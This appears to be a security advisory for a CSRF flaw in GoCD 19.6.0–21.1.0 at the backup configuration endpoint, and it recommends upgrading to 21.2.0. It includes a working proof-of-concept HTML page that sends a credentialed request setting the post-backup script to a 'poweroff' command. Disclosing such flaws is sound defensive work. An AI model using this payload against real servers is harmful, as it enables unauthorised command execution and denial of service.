Overview
In GoCD, versions 19.6.0 to 21.1.0 are vulnerable to Cross-Site Request Forgery due to missing CSRF protection at the `/go/api/config/backup` endpoint. An attacker can trick a victim to click on a malicious link which could change backup configurations or execute system commands in the post_backup_script field.
Details
The module `GoCD` can be abused by Cross-Site Request Forgery due to missing CSRF protection at the `/go/api/config/backup` endpoint. Due to this flaw, an attacker can trick the victim to change the backup configuration settings such as executing system commands in the post_backup_script field and changing the backup schedule by enticing a user to click upon the attacker-controlled website.
PoC Details
Create a file with below content. When an authenticated user clicks on a malicious link sent by the attacker, a CSRF request will be sent to the legitimate server and the backup configuration is changed.
PoC Code
< html>
< script> function backup() {
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
xmlhttp.open("POST", "http://localhost:8153/go/api/config/backup", true);
xmlhttp.setRequestHeader("Accept", "application/vnd.go.cd.v1+json");
xmlhttp.send(JSON.stringify({
"schedule": null,
"post_backup_script": "poweroff",
"email_on_success": false,
"email_on_failure": false
}));
}
backup(); < /script>
</html>
Affected Environments
19.6.0-21.1.0
Prevention
Upgrade to 21.2.0